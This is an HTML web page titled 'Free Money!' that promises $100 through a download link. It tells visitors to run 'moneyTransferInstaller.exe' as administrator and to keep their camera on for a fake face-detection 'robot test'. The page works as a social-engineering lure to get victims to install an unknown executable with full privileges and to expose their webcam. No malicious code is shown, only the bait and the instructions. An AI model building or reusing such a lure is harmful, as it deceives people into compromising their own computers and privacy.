<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <title>Free Money!</title>

    </head>
    <body>
        <div id="main">
            <h1>Free Money:</h1>
            <p>The money you asked for is in the link below. It will download a file which requires a secure i'm not a robot test, so make sure your camera is open and you are looking at it. If the test doesn't find a face, it will not proceed</p>
            <p>Only one of you needs to download the file</p>
            <h2>How to run the file properly:</h2>
            <ul>
                <li>Open file explorer</li>
                <li>Right click the file that you just downloaded (moneyTransferInstaller.exe)</li>
                <li>Click run as administrator</li>
                <li>Enjoy $100 😎</li>
            </ul>
            <a href="/downloadMoney">Download Money</a>
        </div>
    </body>
</html>
